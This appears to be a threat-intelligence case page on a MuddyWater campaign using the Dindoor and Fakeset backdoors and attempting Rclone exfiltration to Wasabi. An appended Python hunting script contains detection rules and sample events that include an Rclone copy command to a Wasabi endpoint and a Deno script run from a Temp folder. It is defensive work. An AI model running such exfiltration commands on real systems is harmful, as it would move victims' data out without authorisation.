Campaign
MuddyWater intrusion into U.S. networks and an Israeli software arm
Updated 06.03.2026 17:15
Case score 55
Score breakdown
- Total: 55
- Lead score: 55
- Support bonus: +0 / 20
- Scoring support: 0
- Context members: 0
Top contributors
- Campaign (lead): Lead campaign item describing MuddyWater footholds across multiple U.S. organizations and an Israeli software arm, including Dindoor and attempted Rclone exfiltration.
Members 1
Latest activity 06.03.2026 17:15
First seen 06.03.2026 12:23
Last seen 06.03.2026 12:23
Overview
MuddyWater has established footholds in U.S. banks, airports, a non-profit, and the Israeli arm of a software company. Broadcom's Symantec and Carbon Black Threat Hunter Team tied the operation to MuddyWater, also known as Seedworm, and described it as a broad access campaign rather than a single isolated compromise. The activity was assessed to have started in early February and was seen again after U.S. and Israeli military strikes on Iran, indicating the intrusion set remained active over time.
The operators used a previously unknown backdoor called **Dindoor**, which executes through the **Deno** JavaScript runtime, and attempted to move data with **Rclone** to a **Wasabi** cloud bucket from the software company arm. Investigators also found a separate Python backdoor called **Fakeset** in other networks; certificate reuse links it to earlier MuddyWater tooling such as Stagecomp and Darkcomp.
Available evidence points to persistence and attempted exfiltration across multiple victims, but it does not quantify the overall reach, the initial access path, or the downstream impact in each environment. Defender attention should center on Dindoor, Fakeset, and unusual cloud-storage egress tied to the affected networks.
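As an added example, not code from this page or from the Symantec/Carbon Black write-up, the following Python hunting script checks EDR-style process-creation events for the two behaviours the campaign summary gives defenders to watch: Rclone transfers toward a Wasabi endpoint, and an interpreter such as Deno (the runtime Dindoor executes through) or Python (the language Fakeset is written in) launching a script from a user-writable directory. The event schema, host names, paths and sample records are constructed for the example; `wasabisys.com` is Wasabi's S3 endpoint domain, and the list of user-writable directories is a heuristic assumption to tune for your environment.

```python
"""
Added example (not from the original page): scan constructed process-creation
events for Rclone-to-Wasabi transfers and interpreters running scripts from
user-writable paths. Field names (host, user, image, cmdline) are an assumed
schema; map them to your own EDR telemetry.
"""
import re
import shlex

# Constructed sample events with hypothetical hosts and paths (not real IoCs).
SAMPLE_EVENTS = [
    {"host": "fin-ws-017", "user": "svc_backup",
     "image": r"C:\Tools\rclone\rclone.exe",
     "cmdline": r"rclone.exe copy D:\exports\ remote:bucket-name --s3-endpoint s3.wasabisys.com -P"},
    {"host": "fin-ws-017", "user": "jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\deno\deno.exe",
     "cmdline": r"deno.exe run --allow-all C:\Users\jdoe\AppData\Local\Temp\update.js"},
    {"host": "build-01", "user": "ci",
     "image": "/usr/local/bin/deno",
     "cmdline": "deno run --allow-net /opt/app/server.ts"},
    {"host": "fin-ws-022", "user": "jdoe",
     "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": "rclone.exe ls corp-share:"},
]

# Rclone verbs that move data to a remote (listing alone is not flagged).
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Interpreters worth checking when they run scripts from disposable locations.
INTERPRETERS = {"deno", "python", "python3", "pythonw"}
# Assumed set of user-writable directories on Windows and POSIX hosts.
USER_WRITABLE = re.compile(
    r"(?:^|[\\/])(?:temp|tmp|appdata|downloads|public|dev[\\/]shm|var[\\/]tmp)(?:[\\/]|$)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Final path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def tokens(cmdline: str) -> list[str]:
    """Split a command line without treating backslashes or '#' specially."""
    lex = shlex.shlex(cmdline, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""
    return [t.strip("\"'") for t in lex]


def flag_event(evt: dict) -> list[str]:
    """Return the list of reasons an event is suspicious (empty if benign)."""
    reasons = []
    exe = basename(evt["image"]).removesuffix(".exe")
    argv = tokens(evt["cmdline"])
    lower = evt["cmdline"].lower()

    if exe == "rclone":
        if "wasabisys.com" in lower:
            reasons.append("rclone: Wasabi endpoint on command line")
        if any(arg in TRANSFER_VERBS for arg in argv[1:]):
            reasons.append("rclone: data transfer verb")

    if exe in INTERPRETERS:
        # First non-flag argument after the interpreter (and a 'run' subcommand)
        # is taken as the script path.
        script = next((a for a in argv[1:] if not a.startswith("-") and a != "run"), None)
        if script and USER_WRITABLE.search(script):
            reasons.append(f"{exe}: script from user-writable path ({script})")

    return reasons


def scan(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Return (host, user, reasons) for every event that triggers a rule."""
    return [(e["host"], e["user"], r) for e in events if (r := flag_event(e))]


if __name__ == "__main__":
    for host, user, reasons in scan(SAMPLE_EVENTS):
        print(f"{host} ({user}): " + "; ".join(reasons))
```

Rclone is a legitimate administration tool and its remotes are normally defined in `rclone.conf` rather than on the command line, so the endpoint rule only catches the explicit case; pair it with DNS or proxy telemetry for `wasabisys.com` and with a baseline of sanctioned Rclone use, and treat the user-writable-path rule as a triage signal rather than a verdict.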